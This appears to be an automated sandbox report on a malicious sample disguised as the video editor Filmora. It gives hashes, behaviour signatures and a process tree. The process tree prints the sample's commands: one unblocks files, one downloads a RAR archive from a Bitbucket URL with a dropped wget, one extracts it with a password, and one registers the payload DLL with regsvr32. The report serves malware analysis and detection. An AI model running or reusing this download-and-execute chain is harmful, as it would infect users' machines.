Analysis

  • max time kernel
    107s
  • max time network
    200s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/11/2022, 14:52

General

  • Target

    Filmora.exe

  • Size

    364KB

  • MD5

    93fde4e38a84c83af842f73b176ab8dc

  • SHA1

    e8c55cc160a0a94e404f544b22e38511b9d71da8

  • SHA256

    fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

  • SHA512

    48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec

  • SSDEEP

    6144:MpS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYqliwrqH1JWP6f:Mp8KLBzQ7Lcf3SiQs2FTTql9unNrkvT2

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Filmora.exe
    "C:\Users\Admin\AppData\Local\Temp\Filmora.exe"
    1⤵
    • Checks computer location settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:3356
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" get-childitem C:\Users\Admin\AppData\Roaming | unblock-file
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5040
    • C:\Users\Admin\AppData\Roaming\winrar.exe
      "C:\Users\Admin\AppData\Roaming\winrar.exe" x -y -p2022 C:\Users\Admin\AppData\Roaming\DirectX32.rar C:\Users\Admin\AppData\Roaming
      2⤵
      • Executes dropped EXE
      • Suspicious use of FindShellTrayWindow
      PID:2772
    • C:\Users\Admin\AppData\Roaming\wget.exe
      "C:\Users\Admin\AppData\Roaming\wget.exe" ping https://bitbucket.org/softget/soft/downloads/DirectX.rar -P C:\Users\Admin\AppData\Roaming
      2⤵
      • Executes dropped EXE
      PID:4860
    • C:\Users\Admin\AppData\Roaming\winrar.exe
      "C:\Users\Admin\AppData\Roaming\winrar.exe" x -y -p2022 C:\Users\Admin\AppData\Roaming\DirectX.rar C:\Users\Admin\AppData\Roaming
      2⤵
      • Executes dropped EXE
      PID:4864
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" get-childitem C:\Users\Admin\AppData\Roaming | unblock-file
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1628
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c regsvr32 /s C:\Users\Admin\AppData\Roaming\DirectX.dll
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2316
      • C:\Windows\SysWOW64\regsvr32.exe
        regsvr32 /s C:\Users\Admin\AppData\Roaming\DirectX.dll
        3⤵
          PID:2296

    Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            0774a05ce5ee4c1af7097353c9296c62

            SHA1

            658ff96b111c21c39d7ad5f510fb72f9762114bb

            SHA256

            d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4

            SHA512

            104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            16KB

            MD5

            fa337df76374f83cc520a43fc92b8476

            SHA1

            3073f2a1adc8e099970e62cdfcc7364e1d73b3e7

            SHA256

            43018b4c22c0519d644a84e62c5fe3761bd8d8151c1512b65f066f16369ce66d

            SHA512

            ae33824f85f71eb84eba2e5a0d58141523163da14922d8e9ddda75f4b10d5e282cfbf3f9f67613ab605834ce5f644fb0c9e426dc01421091225832b713023afb

          • C:\Users\Admin\AppData\Roaming\DirectX32.rar

            Filesize

            1.8MB

            MD5

            75662a7a29fa6ea61f980c3b3441b3b7

            SHA1

            b9486944f5549a76f16153b3dcc53caa289c1acd

            SHA256

            8ab902e78fa8488ffc8d3a51b47fb66314ee057a001fb74675f60583f79159f8

            SHA512

            003323fc6a657e908658332c910340c805c4f7537de17f24a5dce8f643eafad4ad69a8d18b32b272a1e4c2d000e3eaac90929280ceaaa67fc993e711dba6b98a

          • C:\Users\Admin\AppData\Roaming\WinRAR.exe

            Filesize

            2.1MB

            MD5

            f59f4f7bea12dd7c8d44f0a717c21c8e

            SHA1

            17629ccb3bd555b72a4432876145707613100b3e

            SHA256

            f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

            SHA512

            44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

          • C:\Users\Admin\AppData\Roaming\WinRAR.exe

            Filesize

            2.1MB

            MD5

            f59f4f7bea12dd7c8d44f0a717c21c8e

            SHA1

            17629ccb3bd555b72a4432876145707613100b3e

            SHA256

            f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

            SHA512

            44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

          • C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

            Filesize

            12B

            MD5

            b16c8b601adca3290f0ff29d5f25e14f

            SHA1

            977dc0a69454b4ef3352590db5af4861b289e2c1

            SHA256

            5dc982d19ea82fe743b5e8d501a247410352a16bf0ea96694c0b8c4ca75a0906

            SHA512

            c0eb8234fa80838d98e99164f5ba1028c4d9ba215886d242594975e228cf5d24ded7946232f3f90a3f5317a590d4789cfbf9f3e5387a14ffce81b9214f6c2608

          • C:\Users\Admin\AppData\Roaming\wget.exe

            Filesize

            4.9MB

            MD5

            8c04808e4ba12cb793cf661fbbf6c2a0

            SHA1

            bdfdb50c5f251628c332042f85e8dd8cf5f650e3

            SHA256

            a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272

            SHA512

            9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

          • C:\Users\Admin\AppData\Roaming\wget.exe

            Filesize

            4.9MB

            MD5

            8c04808e4ba12cb793cf661fbbf6c2a0

            SHA1

            bdfdb50c5f251628c332042f85e8dd8cf5f650e3

            SHA256

            a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272

            SHA512

            9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

          • memory/5040-143-0x00000000085F0000-0x0000000008C6A000-memory.dmp

            Filesize

            6.5MB

          • memory/5040-142-0x00000000079C0000-0x0000000007F64000-memory.dmp

            Filesize

            5.6MB

          • memory/5040-141-0x0000000006980000-0x00000000069A2000-memory.dmp

            Filesize

            136KB

          • memory/5040-140-0x0000000006930000-0x000000000694A000-memory.dmp

            Filesize

            104KB

          • memory/5040-139-0x00000000069B0000-0x0000000006A46000-memory.dmp

            Filesize

            600KB

          • memory/5040-138-0x00000000063A0000-0x00000000063BE000-memory.dmp

            Filesize

            120KB

          • memory/5040-137-0x0000000005DF0000-0x0000000005E56000-memory.dmp

            Filesize

            408KB

          • memory/5040-136-0x0000000005D10000-0x0000000005D76000-memory.dmp

            Filesize

            408KB

          • memory/5040-135-0x0000000005400000-0x0000000005422000-memory.dmp

            Filesize

            136KB

          • memory/5040-134-0x0000000005570000-0x0000000005B98000-memory.dmp

            Filesize

            6.2MB

          • memory/5040-133-0x0000000002B20000-0x0000000002B56000-memory.dmp

            Filesize

            216KB